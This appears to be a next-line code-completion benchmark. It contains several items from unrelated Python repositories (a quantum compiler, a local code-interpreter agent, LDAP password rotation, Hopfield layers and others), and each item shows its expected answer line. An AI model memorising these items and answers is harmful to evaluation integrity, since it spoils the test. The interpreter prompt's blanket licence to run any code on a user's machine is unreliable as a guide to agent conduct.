class CalScopedSymbolTable(ScopedSymbolTable):
def __init__(
self,
scope_name: str,
enclosing_scope: "ScopedSymbolTable" = None,
) -> None:
def _init_builtins(self):
def __str__(self) -> str:
def insert(self, symbol: Symbol):
def lookup(self, name: str, current_scope_only: bool = False) -> Symbol:
def keys(self, current_scope_only=False) -> list[str]:
def __init__(
self,
scope_name: str,
enclosing_scope: "ScopedSymbolTable" = None,
init_cal: bool = False,
) -> None:
def _init_cal_builtins(self):
# Path: shipyard/passes/semantic_analysis/symbols.py
_BUILTIN_CLASSICAL_SYMBOL_NAMES = [
"ANGLE",
"BIT",
"BITSTRING",
"BOOL",
"COMPLEX",
"DURATION",
"FLOAT",
"IMAGINARY",
"INT",
"STRETCH",
"UINT",
"PORT",
"FRAME",
"WAVEFORM",
"ARRAY",
]
_BUILTIN_QUANTUM_SYMBOL_NAMES = ["QUBIT"]
BUILTIN_TYPES = [
angle_type,
array_type,
bit_type,
bitstring_type,
bool_type,
complex_type,
duration_type,
float_type,
imaginary_type,
int_type,
qubit_type,
stretch_type,
uint_type,
]
BUILTIN_CAL_TYPES = [
frame_type,
port_type,
waveform_type,
]
_ALLOWED_ARRAY_TYPES = [
"ANGLE",
"BIT",
"BOOL",
"COMPLEX",
"FLOAT",
"INT",
"UINT",
]
class Symbol(BaseModel):
class BuiltinSymbol(Symbol):
class BuiltinCalSymbol(Symbol):
class ArraySymbol(Symbol):
class AliasSymbol(Symbol):
class ClassicalSymbol(Symbol):
class LiteralSymbol(ClassicalSymbol):
class ConstantSymbol(Symbol):
class IOSymbol(Symbol):
class QuantumSymbol(Symbol):
class GrammarSymbol(Symbol):
class SubroutineSymbol(Symbol):
class ExternSymbol(SubroutineSymbol):
class GateSymbol(SubroutineSymbol):
class DefcalSymbol(GateSymbol):
def force_kind_uppercase(cls, kind: str) -> str:
def kind_of_builtin_is_none(kind: str) -> str:
def kind_is_array(cls, kind: str) -> str:
def array_base_type_must_be_of_allowed_type(cls, base_type: str) -> str:
def kind_must_be_name_of_classical_type(kind: str) -> str:
def kind_must_be_name_of_quantum_type(cls, kind: str) -> str:
def return_classical_or_none(cls, return_type: str):
# Path: tests/passes/semantic_analysis/test_scoped_symbol_table.py
import pytest
from shipyard.passes.semantic_analysis import scoped_symbol_table as sst
from shipyard.passes.semantic_analysis import symbols
"""
The scoped symbol table is intended to be used by the Semantic Analyser module.
An 'end-to-end' use case example will be included in the tests for the Semantic Analyser
ToDo update working when adding semantic analyser tests
"""
SYMBOL_LISTS = [sst.BUILTIN_TYPES, sst.BUILTIN_ZI_EXP]
CAL_SYMBOL_LISTS = [sst.BUILTIN_CAL_TYPES, sst.BUILTIN_OPENPULSE, sst.BUILTIN_ZI_WFM]
@pytest.fixture(name="main_table")
def fixture_main_table() -> sst.ScopedSymbolTable:
"""Fixture for creating the 'main' ScopedSymbolTable
this table has no enclosing scope
Returns:
sst.ScopedSymbolTable: symbol table with no enclosing scope
"""
return sst.ScopedSymbolTable("main")
@pytest.fixture(name="nested_table")
def fixture_nested_table(main_table: sst.ScopedSymbolTable) -> sst.ScopedSymbolTable:
"""Fixture for creating a nested ScopedSymbolTable
the 'main' symbol table encloses this table
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.ScopedSymbolTable: symbol table with enclosing scope
"""
return sst.ScopedSymbolTable("nested", enclosing_scope=main_table)
@pytest.fixture(name="cal_table")
def fixture_cal_table(main_table: sst.ScopedSymbolTable) -> sst.CalScopedSymbolTable:
"""
Fixture for creating 'main' a ScopedSymbolTable for openPulse code,
has the 'main' symbol table as an enclosing scope and is initialised with
init_cal set to True
Args:
main_table (sst.ScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: main calibration symbol table
"""
return sst.CalScopedSymbolTable("cal", enclosing_scope=main_table, init_cal=True)
@pytest.fixture(name="defcal_table")
def fixture_defcal_table(
cal_table: sst.CalScopedSymbolTable,
) -> sst.CalScopedSymbolTable:
"""
Fixture for creating a nested ScopedSymbolTable for openPulse code,
has the 'main calibration' (cal_table) as an enclosing scope
Args:
cal_table (sst.CalScopedSymbolTable): used as enclosing scope for this table
Returns:
sst.CalScopedSymbolTable: nested calibration symbol table
"""
return sst.CalScopedSymbolTable("defcal", enclosing_scope=cal_table)
def test_scoped_symbol_table_basic(main_table: sst.ScopedSymbolTable):
"""Test basic insertion and lookup in table without enclosing scope"""
# test that built in symbols have been inserted
for symbol_list in SYMBOL_LISTS:
symbol_names = []
for symbol in symbol_list:
assert main_table.lookup(symbol.name) is symbol
symbol_names.append(symbol.name)
# test that names of builtin symbols are returned by the keys method
for name in symbol_names:
assert name in main_table.keys()
assert name in main_table.keys(current_scope_only=True)
# test inserting a symbol and lookin it up and name being returned by keys()
| c_symbol = symbols.ClassicalSymbol(name="test", kind=symbols.angle_type.name) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: PrAsAnNaRePo/LocalAgent
# Path: localagent/utils.py
def get_prompt_from_template(system, history, human_, assistant_, eos_token):
for i in history:
if i['role'] == 'user':
system += f'{human_}{i["content"]}{eos_token}'
if i['role'] == 'assistant':
system += f'{assistant_}{i["content"]}{eos_token}'
if history[-1]['role'] == 'user':
system += f'{assistant_}'
return system
# Path: localagent/utils.py
def internal_monologue(msg):
# ANSI escape code for italic is '\x1B[3m'
print(f"\x1B[3m{Fore.LIGHTBLACK_EX}💭 {msg}{Style.RESET_ALL}")
# Path: localagent/gen.py
def run(uri, prompt, force_model=False):
if force_model:
prompt += "\nThought:"
request = {
'prompt': prompt,
'max_new_tokens': 500,
'auto_max_new_tokens': False,
'max_tokens_second': 0,
'do_sample': True,
'temperature': 0.01,
'repetition_penalty': 1.24,
'temperature': 0.1,
'skip_special_tokens': True,
'stopping_strings': ['<|end_of_turn|>', '<|im_end|>', 'Observation']
}
response = requests.post(uri, json=request)
if response.status_code == 200:
result = response.json()['results'][0]['text']
return '\nThought:'+result if force_model else result
# Path: localagent/gen.py
def stream_run(uri, prompt, force_model=False):
return asyncio.run(print_response_stream(uri, prompt, force_model))
# Path: localagent/gen.py
def ollama_generate(model_name, prompt=None, system=None, template=None, stream=False, format="", context=None, options=None, callback=None, force_model=False):
try:
if template is not None and force_model:
template += '\nThought:'
url = f"{BASE_URL}/api/generate"
payload = {
"model": model_name,
"prompt": prompt,
"system": system,
"template": template,
"context": context,
"options": options,
"format": format,
}
# Remove keys with None values
payload = {k: v for k, v in payload.items() if v is not None}
with requests.post(url, json=payload, stream=True) as response:
response.raise_for_status()
# Creating a variable to hold the context history of the final chunk
final_context = None
# Variable to hold concatenated response strings if no callback is provided
full_response = ""
# Iterating over the response line by line and displaying the details
for line in response.iter_lines():
if line:
# Parsing each line (JSON chunk) and extracting the details
chunk = json.loads(line)
# If a callback function is provided, call it with the chunk
if callback:
callback(chunk)
else:
# If this is not the last chunk, add the "response" field value to full_response and print it
if not chunk.get("done"):
response_piece = chunk.get("response", "")
full_response += response_piece
if 'Observation' in full_response:
break
if stream:
print(response_piece, end="", flush=True)
# Check if it's the last chunk (done is true)
if chunk.get("done"):
final_context = chunk.get("context")
full_response = full_response.replace('Observation', '')
# Return the full response and the final context
return '\nThought:'+full_response if force_model else full_response, final_context
except requests.exceptions.RequestException as e:
print(f"An error occurred: {e}")
return None, None
# Path: localagent/interpreter.py
import subprocess
import sys
from localagent.utils import get_prompt_from_template, internal_monologue
from localagent.gen import run, stream_run, ollama_generate
from rich.console import Console
console = Console()
CODE_INTERPRETER = """You are Open Interpreter, a world-class programmer that can complete any goal by executing code.
First, write a plan. **Always recap the plan between each code block**.
When you execute code, it will be executed **on the user's machine**. The user has given you **full and complete permission** to execute any code necessary to complete the task.
If you want to send data between programming languages, save the data to a txt or json.
You can access the internet. Run **any code** to achieve the goal, and if at first you don't succeed, try again and again.
You can install new packages.
When a user refers to a filename, they're likely referring to an existing file in the directory you're currently executing code in.
Write messages to the user in Markdown.
In general, try to **make plans** with as few steps as possible. Remember that one code block is considered as a single file and you can't able to access the variable from first code blocks in the second one.
You are capable of **any** task. Don't install libraries using '!' in the python code block instead use seperate bash code block.
As a open interpreter you should mostly respond with codes more than a text. Always tries to print the things up so you can know them via output.
"""
def extract_code(string):
code_blocks = []
parts = string.split("```")
for i in range(1, len(parts), 2):
lines = parts[i].split("\n")
lang = lines[0]
code = "\n".join(lines[1:])
code_blocks.append((lang, code))
return code_blocks
class Interpreter:
def __init__(self, exec, max_try, human_, assistant_, eos_token, stream=False) -> None:
self.history = []
self.exec = exec
self.max_try = max_try
self.human_ = human_
self.assistant_ = assistant_
self.eos_token = eos_token
self.stream = stream
def execute_code(self, lang, code, timeout=10):
if lang.lower() == 'python':
try:
output = subprocess.run([sys.executable, "-c", code], capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Python code timed out after {timeout} seconds.")
return None
elif lang.lower() == 'bash':
try:
output = subprocess.run(code, shell=True, capture_output=True, text=True, timeout=timeout)
except subprocess.TimeoutExpired:
print(f"Execution of Bash code timed out after {timeout} seconds.")
return None
else:
print('Only supported python and ')
return None
return output
def __call__(self, task):
print('\n')
| internal_monologue("Interpreter is executing the code...\n") |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Cymaphore/orfodon-service
# Path: config.py
# Path: feeds.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: hashtag_modification.py
# Path: orfodon_service.py
import re
import yaml
import copy
import feedparser
import time
import requests
import hashlib
from datetime import datetime
from bs4 import BeautifulSoup
from mastodon import Mastodon
from pprint import pprint
from config import config
from credentials import credentials
from feeds import feeds
from hashtag_modification import hashtag_replace
from hashtag_modification import hashtag_blacklist
from hashtag_modification import category_aliases
from hashtag_modification import oewa_sport_aliases
from hashtag_modification import oewa_bypass
hashtag_wordlist = []
#############################################################################
##
# Main function
# Call all the stages in correct order
def main():
# Load hashtag wordlists
load_hashtags()
# Load previous state, initialize new state
load_state()
# Load the configured feeds and preprocess text
load_feeds()
# Grab post references from other channels for boosting, keep id from oldState
grab_posts()
# Post newly generated articles to the channels
post_feeds()
# Save state for next cycle
save_state()
#############################################################################
##
# Load hashtag wordlists
def load_hashtags():
hashtags_filename = config["files"]["global_hashtags"]
if True:
hashtags_file = open(hashtags_filename, "r")
global hashtag_wordlist
hashtag_wordlist = hashtags_file.read().splitlines()
#############################################################################
##
# Load the configured feeds and preprocess text
def load_state():
global state
global oldState
global hashtag_wordlist
try:
with open(config["files"]["state"]) as fh:
oldState = yaml.load(fh, yaml.SafeLoader)
except:
oldState = {}
for feed in feeds:
if not feed["id"] in state:
state[feed["id"]] = {}
if not feed["id"] in oldState:
oldState[feed["id"]] = {}
#############################################################################
##
# Save state for next cycle
def save_state():
with open(config["files"]["state"], 'w') as fh:
fh.write(yaml.dump(state, default_flow_style=False))
#############################################################################
##
# Load the configured feeds and preprocess text
def load_feeds():
global state
global oldState
for feed in feeds:
feedStateOld = oldState[feed["id"]]
feedState = state[feed["id"]]
if "url" in feed:
entries = feedparser.parse(feed["url"]).entries
if len(entries) < 1:
raise RuntimeError("No elements in feed " + feed["url"])
for entry in entries:
title = entry.get('title')
text = entry.get('summary')
url = entry.get('link')
category = entry.get('category')
raw_posting = ""
post_type_text = False
hashtags = []
updated = entry.get('updated')
boost_target = ""
edited = False
exists = False
oldPosting = {}
status_id = 0
posted = False
post_text = ""
boosted = False
ref = ""
if url in feedStateOld:
exists = True
oldPosting = feedStateOld[url]
if "status_id" in oldPosting:
status_id = oldPosting["status_id"]
if "posted" in oldPosting:
posted = oldPosting["posted"]
if "boosted" in oldPosting:
boosted = oldPosting["boosted"]
first_oewa = False
if "enable_oewa_sport" in feed and feed["enable_oewa_sport"]:
first_oewa = True
| if not category in oewa_bypass: |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Vitesco-Technologies/ldap-password-rotation
# Path: src/lambda_function.py
SECRETS_MANAGER_KEY_USERNAME = (
os.environ.get("SECRETS_MANAGER_KEY_USERNAME") or "username"
)
SECRETS_MANAGER_KEY_PASSWORD = (
os.environ.get("SECRETS_MANAGER_KEY_PASSWORD") or "password"
)
SECRETS_MANAGER_KEY_DN = os.environ.get("SECRETS_MANAGER_KEY_DN") or ""
SECRETS_MANAGER_REGION = os.environ.get("SECRETS_MANAGER_REGION") or "eu-central-1"
EXCLUDE_CHARACTERS_USER = os.environ.get("EXCLUDE_CHARACTERS_USER") or "$/'\"\\"
EXCLUDE_CHARACTERS_PW = os.environ.get("EXCLUDE_CHARACTERS_PW") or "@$/`'\"\\"
EXCLUDE_CHARACTERS_NEW_PW = os.environ.get("EXCLUDE_CHARACTERS_NEW_PW") or "@$/`'\"\\"
LDAP_SERVER_LIST = (
os.environ.get("LDAP_SERVER_LIST")
or '["ldaps://ex1dcsrv1001.ex1.example.com", "ldaps://ex1dcsrv1002.ex1.example.com"]'
)
LDAP_SERVER_PORT = os.environ.get("LDAP_SERVER_PORT") or "636"
LDAP_BASE_DN = os.environ.get("LDAP_BASE_DN") or "dc=ex1,dc=example,dc=com"
LDAP_USER_AUTH_ATTRIBUTE = (
os.environ.get("LDAP_USER_AUTH_ATTRIBUTE") or "userPrincipalName"
)
LDAP_USE_SSL = True
LDAP_BIND_CURRENT_CREDS_SUCCESSFUL = "LDAP_BIND_USING_CURRENT_CREDS_SUCCESSFUL"
LDAP_BIND_PENDING_CREDS_SUCCESSFUL = "LDAP_BIND_USING_PENDING_CREDS_SUCCESSFUL"
def lambda_handler(event, context):
def create_secret(secrets_manager_client, arn, token, current_dict):
def set_secret(current_dict, pending_dict):
def test_secret(pending_dict):
def finish_secret(secrets_manager_client, arn, token):
def get_secret_dict(secrets_manager_client, arn, stage, token=None):
def execute_ldap_command(current_dict, pending_dict):
def check_inputs(dict_arg):
def get_user_dn(conn, user, base_dn=LDAP_BASE_DN):
def ldap_connection(dict_arg):
# Path: tests/utilities/lambda_util.py
def get_role_name():
def _zip_lambda(func_str):
def get_lambda_zip_file():
# Path: tests/utilities/ldap_test/server.py
class LdapServer(object):
def __init__(
self,
config=None,
java_gateway_port=DEFAULT_GATEWAY_PORT,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
java_delay=None,
):
global SERVER_PROCESS, JVM_GATEWAY
if SERVER_PROCESS is None:
SERVER_PROCESS = run_jvm_server(java_gateway_port)
# Added to introduce a delay between starting the SERVER_PROCESS and the JVM_GATEWAY if desired.
# This seems to be a problem on some MacOS systems, and without it you end up with an infinite hang.
if java_delay:
time.sleep(java_delay)
if JVM_GATEWAY is None:
JVM_GATEWAY = run_jvm_gateway(java_gateway_port, python_proxy_port)
self.server = JVM_GATEWAY.entry_point
self.config, self._config_obj = ConfigBuilder(JVM_GATEWAY).build_from(config)
self.server_id = self.server.create(self._config_obj)
def start(self):
self.server.start(self.server_id)
def stop(self):
self.server.stop(self.server_id)
# Path: tests/test_lambda.py
import json
import logging
import os
import boto3
import ldap3
import mock
import pytest
from uuid import uuid4
from moto import mock_lambda, mock_secretsmanager
from src import lambda_function
from .utilities import lambda_util
from .utilities.ldap_test import LdapServer
# Copyright 2023 Daniel Dias, Vitesco Technologies
#
# SPDX-License-Identifier: Apache-2.0
_region = "eu-central-1"
# server is defined as global to allow us to update it when we mock
# ldap3.extend.microsoft.modifyPassword.ad_modify_password with mock_ad_modify_password
_server = LdapServer()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
############
# fixtures #
############
@pytest.fixture(scope="function", autouse=True)
def aws_credentials():
"""Mocked AWS Credentials for moto."""
os.environ["AWS_ACCESS_KEY_ID"] = "testing"
os.environ["AWS_SECRET_ACCESS_KEY"] = "testing"
os.environ["AWS_SECURITY_TOKEN"] = "testing"
os.environ["AWS_SESSION_TOKEN"] = "testing"
os.environ["AWS_DEFAULT_REGION"] = _region
@pytest.fixture(scope="function", autouse=True)
def lambda_env():
| lambda_function.SECRETS_MANAGER_KEY_USERNAME = "bind_dn" |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: totallynotadi/vibrant-python
# Path: vibrant/generator.py
def generate(swatches: List[Swatch]) -> Palette:
max_poplation = find_max_population(swatches)
palette: Palette = generate_variation_colors(
swatches, max_poplation, generator_opts
)
generate_empty_swatches(palette, generator_opts)
return palette
# Path: vibrant/image.py
class VibrantImage:
def __init__(
self,
src: Union[
bytes,
str,
io.BytesIO,
io.BufferedReader,
PILImage,
"VibrantImage",
],
props: Optional[Props] = Props(),
) -> None:
self.image: Image = None
self.props: Props = props
if isinstance(src, str):
if src.startswith("http"):
src = requests.get(src).content
if not os.path.exists(src):
raise FileNotFoundError("Image doesn't exist at given path - %s." % src)
if isinstance(src, bytes):
src = io.BytesIO(src)
if isinstance(src, PILImage):
self.image = src
else:
self.image = Image.open(src)
@classmethod
def from_url(cls, src: str) -> "VibrantImage":
src = requests.get(src).content
src = io.BytesIO(src)
return cls(Image.open(src))
@classmethod
def from_path(cls, src: str) -> "VibrantImage":
if os.path.exists(src):
return cls(Image.open(src))
raise FileNotFoundError("Image doesn't exist at given path - %s." % src)
@classmethod
def from_bytes(cls, src: bytes) -> "VibrantImage":
src = io.BytesIO(src)
return cls(Image.open(src))
@classmethod
def from_fp(cls, fp: io.BufferedReader) -> "VibrantImage":
return cls(Image.open(fp))
def scale_down(self):
...
def _swatch_filter(self, swatch: List[int]) -> bool:
r, g, b = swatch.rgb
return not (r > 250 and g > 250 and b > 250)
def _parse_swatches(
self,
raw_swatches: List,
swatch_populations: List[Tuple[int, int]],
) -> List[Swatch]:
swatches = []
curr_idx = 0
for idx in range(0, len(raw_swatches), 3):
if idx + 2 <= (len(raw_swatches) - 1):
swatches.append(
Swatch(
rgb=[
raw_swatches[idx],
raw_swatches[idx + 1],
raw_swatches[idx + 2],
],
population=swatch_populations[curr_idx][0],
)
)
curr_idx += 1
return swatches
def quantize(self) -> List[Swatch]:
self.image = self.image.quantize(self.props.color_count)
raw_swatches = self.image.getpalette()
raw_swatches = list(filter(lambda x: x != 0, raw_swatches))
swatch_populations = self.image.getcolors(self.props.color_count)
swatches = self._parse_swatches(
raw_swatches=raw_swatches,
swatch_populations=swatch_populations,
)
return swatches
# Path: vibrant/models.py
class Palette:
vibrant: Swatch = None
dark_vibrant: Swatch = None
light_vibrant: Swatch = None
muted: Swatch = None
dark_muted: Swatch = None
light_muted: Swatch = None
# Path: vibrant/models.py
class Props:
color_count: int = 64
quality: int = 5
# Path: vibrant/main.py
import io
from typing import Union
from PIL.Image import Image as PILImage
from vibrant.generator import generate
from vibrant.image import VibrantImage
from vibrant.models import Palette, Props
class Vibrant:
props: Props
def __init__(self, color_count=64, quality=5) -> None:
self.props = Props(color_count=color_count, quality=quality)
def get_palette(
self,
src: Union[
bytes,
str,
io.BytesIO,
io.BufferedReader,
PILImage,
| VibrantImage, |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: MAGICS-LAB/SparseModernHopfield
# Path: utils/sparse_max.py
class Sparsemax(nn.Module):
__constants__ = ["dim"]
def __init__(self, dim=-1):
"""
Sparsemax class as seen in https://arxiv.org/pdf/1602.02068.pdf
Parameters
----------
dim: The dimension we want to cast the operation over. Default -1
"""
super(Sparsemax, self).__init__()
self.dim = dim
def __setstate__(self, state):
self.__dict__.update(state)
if not hasattr(self, "dim"):
self.dim = None
def forward(self, input):
a = SparsemaxFunction.apply(input, self.dim)
return a
def extra_repr(self):
return f"dim={self.dim}"
# Path: utils/entmax.py
class Entmax15(nn.Module):
def __init__(self, dim=-1, k=None):
"""1.5-entmax: normalizing sparse transform (a la softmax).
Solves the optimization problem:
max_p <x, p> - H_1.5(p) s.t. p >= 0, sum(p) == 1.
where H_1.5(p) is the Tsallis alpha-entropy with alpha=1.5.
Parameters
----------
dim : int
The dimension along which to apply 1.5-entmax.
k : int or None
number of largest elements to partial-sort over. For optimal
performance, should be slightly bigger than the expected number of
nonzeros in the solution. If the solution is more than k-sparse,
this function is recursively called with a 2*k schedule.
If `None`, full sorting is performed from the beginning.
"""
self.dim = dim
self.k = k
super(Entmax15, self).__init__()
def forward(self, X):
return entmax15(X, dim=self.dim, k=self.k)
# Path: utils/general_entmax.py
class EntmaxAlpha(nn.Module):
def __init__(self, head_count=4, dim=-1):
super(EntmaxAlpha, self).__init__()
self.dim = dim
# self.alpha_chooser = nn.Parameter(AlphaChooser(1)())
self.alpha = nn.Parameter(torch.randn(head_count))
def forward(self, att_scores):
batch_size, head_count, query_len, key_len = att_scores.size()
expanded_alpha = (
self.alpha.unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
) # [1,nb_heads,1,1]
# expanded_alpha = expanded_alpha.repeat(1, head_count, 1, 1)
expanded_alpha = expanded_alpha.expand(
(batch_size, -1, query_len, 1)
) # [bs, nb_heads, query_len,1]
# expanded_alpha += 1
expanded_alpha = 1 + torch.sigmoid(expanded_alpha)
# torch.clamp(1+expanded_alpha, min=1.0, max=4.0)
p_star = entmax_bisect(att_scores, expanded_alpha)
return p_star
# Path: layers.py
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
from einops import rearrange, repeat
from math import sqrt
from utils.sparse_max import Sparsemax
from utils.entmax import Entmax15
from utils.general_entmax import EntmaxAlpha
class FullAttention(nn.Module):
'''
The Attention operation
'''
def __init__(self, scale=None, attention_dropout=0.0):
super(FullAttention, self).__init__()
self.scale = scale
self.dropout = nn.Dropout(attention_dropout)
def forward(self, queries, keys, values, mask=None):
B, L, H, E = queries.shape
_, S, _, D = values.shape
scale = self.scale or 1. / sqrt(E)
scores = torch.einsum("blhe,bshe->bhls", queries, keys)
if mask is not None:
mask = mask.unsqueeze(1).unsqueeze(1).repeat(1, H, scores.size(-2), 1)
scores = scores.masked_fill_(mask, float('-inf'))
A = self.dropout(torch.softmax(scale * scores, dim=-1))
V = torch.einsum("bhls,bshd->blhd", A, values)
return V.contiguous()
class AttentionLayer(nn.Module):
'''
The Multi-head Self-Attention (MSA) Layer
'''
def __init__(
self,
d_model,
n_heads,
d_keys=None,
d_values=None,
mix=True,
dropout=0.1,
scale=None):
super(AttentionLayer, self).__init__()
d_keys = d_keys or (d_model // n_heads)
d_values = d_values or (d_model // n_heads)
self.d_model = d_model
self.inner_attention = FullAttention(
scale=scale, attention_dropout=dropout)
self.query_projection = nn.Linear(d_model, d_keys * n_heads)
self.key_projection = nn.Linear(d_model, d_keys * n_heads)
self.value_projection = nn.Linear(d_model, d_values * n_heads)
self.out_projection = nn.Linear(d_values * n_heads, d_model)
self.n_heads = n_heads
self.mix = mix
def forward(self, inputs):
queries = inputs
keys = inputs
values = inputs
B, L, _ = queries.shape
_, S, _ = keys.shape
H = self.n_heads
queries = self.query_projection(queries).view(B, L, H, -1)
keys = self.key_projection(keys).view(B, S, H, -1)
values = self.value_projection(values).view(B, S, H, -1)
out = self.inner_attention(
queries,
keys,
values,
)
out = out.view(B, L, -1)
out = out.mean(1)
return self.out_projection(out)
class HopfieldCore(nn.Module):
'''
The Hopfield operation
'''
def __init__(self, scale=None, attention_dropout=0.0, mode='sparsemax', norm=False):
super(HopfieldCore, self).__init__()
self.scale = scale
self.norm = norm
self.dropout = nn.Dropout(attention_dropout)
if mode == 'sparsemax':
self.softmax = Sparsemax(dim=-1)
elif mode == 'entmax':
| self.softmax = Entmax15(dim=-1) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Kuba314/arcparse
# Path: arcparse/errors.py
class InvalidArgument(InvalidParser):
pass
# Path: arcparse/errors.py
class InvalidTypehint(InvalidArgument):
pass
# Path: arcparse/errors.py
class MissingConverter(InvalidArgument):
pass
# Path: arcparse/_typehints.py
def extract_collection_type(typehint: type) -> type | None:
origin = get_origin(typehint)
if origin == list:
return get_args(typehint)[0]
return None
# Path: arcparse/_typehints.py
def extract_literal_strings(typehint: type) -> list[str] | None:
origin = get_origin(typehint)
if origin != Literal:
return None
args = get_args(typehint)
if not all(isinstance(arg, str) for arg in args):
return None
return list(args)
# Path: arcparse/_typehints.py
def extract_optional_type(typehint: type) -> type | None:
origin = get_origin(typehint)
if origin == Optional:
return get_args(typehint)[0]
elif origin in {Union, UnionType}:
args = get_args(typehint)
if len(args) == 2:
if args[0] == NoneType:
return args[1]
elif args[1] == NoneType:
return args[0]
return None
# Path: arcparse/_typehints.py
def extract_type_from_typehint(typehint: type) -> type:
if optional_type := extract_optional_type(typehint):
return optional_type
elif collection_type := extract_collection_type(typehint):
return collection_type
return typehint
# Path: arcparse/arguments.py
class Void:
class ContainerApplicable(Protocol):
class BaseArgument(ABC, ContainerApplicable):
class Flag(BaseArgument):
class NoFlag(BaseArgument):
class TriFlag(ContainerApplicable):
class BaseValueArgument[T](BaseArgument):
class Positional[T](BaseValueArgument[T]):
class Option[T](BaseValueArgument[T]):
class MxGroup:
class Subparsers:
def apply(self, actions_container: _ActionsContainer, name: str) -> Action:
def apply(self, actions_container: _ActionsContainer, name: str) -> Action:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def apply(self, actions_container: _ActionsContainer, name: str) -> None:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
def get_argparse_args(self, name: str) -> list[str]:
def get_argparse_kwargs(self, name: str) -> dict[str, Any]:
# Path: arcparse/converters.py
class itemwise[T]:
"""Mark converter as itemwise
This changes its return-type signature to wrap T in list. This is used in
argument converter declaration. Argument converters returning T make the
argument also return T. However if an itemwise conversion is desired on
arguments accepting multiple values (nargs="*"), the return type should
always be wrapped in a list.
"""
def __init__(self, converter: Callable[[str], T]) -> None:
self._converter = converter
def __call__(self, string: str) -> list[T]:
return self._converter(string) # type: ignore
def __repr__(self) -> str:
return f"itemwise({self._converter})"
# Path: arcparse/_partial_arguments.py
from abc import ABC, abstractmethod
from collections.abc import Callable, Collection
from dataclasses import dataclass
from typing import Any, Literal, get_origin
from arcparse.errors import InvalidArgument, InvalidTypehint, MissingConverter
from ._typehints import (
extract_collection_type,
extract_literal_strings,
extract_optional_type,
extract_type_from_typehint,
)
from .arguments import (
BaseValueArgument,
ContainerApplicable,
Flag,
NoFlag,
Option,
Positional,
TriFlag,
Void,
void,
)
from .converters import itemwise
import re
@dataclass(kw_only=True, eq=False)
class PartialMxGroup:
required: bool = False
@dataclass(kw_only=True)
| class BasePartialArgument[R: ContainerApplicable](ABC): |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: rohitsinghlab/sceodesic
# Path: sceodesic/utils/fn_timer.py
def fn_timer(func):
@wraps(func)
def wrapper(*args, **kwargs):
# run and time function
start_time = time.time()
result = func(*args, **kwargs)
end_time = time.time()
elapsed_time = end_time - start_time
print(f"{func.__name__} took {elapsed_time:.3f} seconds to run.")
return result
return wrapper
# Path: sceodesic/helper/compute_covariance.py
def compute_covariance_and_ncomps_pct_variance(data, max_condition_number, pvd_pct):
""" Computes a symmetric positive definite sample covariance matrix.
- `data` is a cell x gene 2D numpy array.
"""
# Compute raw covariance.
matrix = np.cov(data, rowvar=False)
S,U = np.linalg.eigh(matrix)
ncomps_pct_variance = np.argmax(np.cumsum(S[::-1]) / np.sum(S) >= pvd_pct) + 1
# normalize by condition-volume
matrix = _normalize_condition_volume(S, U, max_condition_number, log=False)
return matrix, ncomps_pct_variance
# Path: sceodesic/sceo_main/estimate_covariances.py
import scipy
import pickle
import sys
from ..utils import fn_timer
from ..helper import compute_covariance_and_ncomps_pct_variance
from .default_keys import *
# package-specific modules
@fn_timer
def estimate_covariances(adata, max_condition_number, pvd_pct=0.9,
copy=False, return_results=False,
top_genes=None, cohort_assn=None,
uns_key=None):
if uns_key is None:
uns_key = UNS_KEY
# not able to be passed in
hvg_key = HVG_KEY
# top_genes can either be passed in anew or be precomputed using get_locally_variable_genes
if top_genes is None:
try:
top_genes = adata.uns[uns_key][hvg_key]
except Exception as e:
message = ("Error: must either specify a set of genes to consider or "
"have run sceodesic.get_locally_variable_genes beforehand.")
print(message, file=sys.stderr)
raise e
else:
adata.uns[uns_key][hvg_key] = top_genes
# can either pass in a cell cohort assignment (array cohort_assn with cell[i] having cluster assn cohort_assn[i])
# or the cluster_key
clustering_results = None
if cohort_assn is None:
try:
clustering_results = adata.uns[uns_key]
except:
message = ("Error: must either specify a cell cohort assignment or "
"have run sceodesic.get_cell_cohorts beforehand.")
print(message, file=sys.stderr)
raise e
else:
c2c = {}
for i, c in enumerate(cohort_assn):
c2c[c] = c2c.get(c, []) + [i]
clustering_results = {'cell2cluster': c2c, 'stratify_cols': '***NOT SPECIFIED***'}
